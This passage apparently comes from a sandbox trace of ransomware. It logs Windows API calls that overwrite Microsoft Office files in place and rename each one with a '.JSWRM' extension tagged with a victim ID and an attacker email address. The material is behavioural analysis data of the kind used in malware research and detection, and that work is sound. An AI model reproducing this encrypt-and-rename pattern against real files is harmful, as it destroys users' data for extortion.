lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x1090, lpOverlapped=0x0) returned 1 [0128.315] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sl\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sl\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sl\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.318] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.318] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.319] CloseHandle (hObject=0x314) returned 1 [0128.319] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.319] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10b0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x10b0, lpOverlapped=0x0) returned 1 [0128.321] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.321] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10b0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x10b0, lpOverlapped=0x0) returned 1 [0128.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-cyrl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-cyrl\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-cyrl\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-cyrl\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.324] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.324] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.325] CloseHandle (hObject=0x314) returned 1 [0128.326] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.326] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10b0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x10b0, lpOverlapped=0x0) returned 1 [0128.378] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.378] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10b0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x10b0, lpOverlapped=0x0) returned 1 [0128.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-latn\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-latn\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-latn\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-latn\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.382] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.382] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.383] CloseHandle (hObject=0x314) returned 1 [0128.384] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.384] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10b0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x10b0, lpOverlapped=0x0) returned 1 [0128.385] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.385] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10b0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x10b0, lpOverlapped=0x0) returned 1 [0128.386] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-Latn-CS\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-latn-cs\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sr-Latn-CS\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sr-latn-cs\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.388] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.388] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.390] CloseHandle (hObject=0x314) returned 1 [0128.391] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.391] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10d0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x10d0, lpOverlapped=0x0) returned 1 [0128.392] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.392] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x10d0, lpOverlapped=0x0) returned 1 [0128.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sv\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sv\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sv\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sv\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.396] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.396] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.397] CloseHandle (hObject=0x314) returned 1 [0128.398] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.398] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1760, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x1760, lpOverlapped=0x0) returned 1 [0128.399] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.399] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x1760, lpOverlapped=0x0) returned 1 [0128.400] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\th\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\th\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\th\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\th\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.402] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.402] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.404] CloseHandle (hObject=0x314) returned 1 [0128.405] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.405] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10b0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x10b0, lpOverlapped=0x0) returned 1 [0128.408] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.408] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10b0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x10b0, lpOverlapped=0x0) returned 1 [0128.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\tr\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\tr\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\tr\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\tr\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.410] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.432] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.432] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.433] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\tracedefinition110.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\tracedefinition110.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\tracedefinition110.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\tracedefinition110.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.437] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.437] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.438] CloseHandle (hObject=0x314) returned 1 [0128.440] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.440] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1650, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x1650, lpOverlapped=0x0) returned 1 [0128.442] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.442] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x1650, lpOverlapped=0x0) returned 1 [0128.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\uk\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\uk\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\uk\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\uk\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.448] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.448] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.450] CloseHandle (hObject=0x314) returned 1 [0128.450] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.450] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x12a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x12a0, lpOverlapped=0x0) returned 1 [0128.452] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.452] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x12a0, lpOverlapped=0x0) returned 1 [0128.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\vi\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\vi\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\vi\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\vi\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.455] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.456] CloseHandle (hObject=0x314) returned 1 [0128.457] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.457] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0xf90, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0xf90, lpOverlapped=0x0) returned 1 [0128.484] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.484] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0xf90, lpOverlapped=0x0) returned 1 [0128.486] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\zh-CHS\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\zh-chs\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\zh-CHS\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\zh-chs\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.488] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.488] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.490] CloseHandle (hObject=0x314) returned 1 [0128.490] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.490] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0xf90, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0xf90, lpOverlapped=0x0) returned 1 [0128.492] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.492] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0xf90, lpOverlapped=0x0) returned 1 [0128.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\zh-CHT\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\zh-cht\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\zh-CHT\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\zh-cht\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.495] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.495] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x66b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x66b0, lpOverlapped=0x0) returned 1 [0128.498] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.498] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x66b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x66b0, lpOverlapped=0x0) returned 1 [0128.505] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\bdcmetadata.xsd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bdcmetadata.xsd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\bdcmetadata.xsd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bdcmetadata.xsd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.508] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.508] ReadFile (in: hFile=0x45c, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3320, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345ec04*=0x3320, lpOverlapped=0x0) returned 1 [0128.510] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.510] WriteFile (in: hFile=0x45c, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3320, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345ec00*=0x3320, lpOverlapped=0x0) returned 1 [0128.511] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\bdcmetadataresource.xsd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bdcmetadataresource.xsd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\bdcmetadataresource.xsd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bdcmetadataresource.xsd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.514] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.514] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0128.515] CloseHandle (hObject=0x45c) returned 1 [0128.516] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.516] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7920, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x7920, lpOverlapped=0x0) returned 1 [0128.520] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.520] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7920, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x7920, lpOverlapped=0x0) returned 1 [0128.521] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Author2String.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\author2string.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Author2String.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\author2string.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.523] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.523] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xfe0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xfe0, 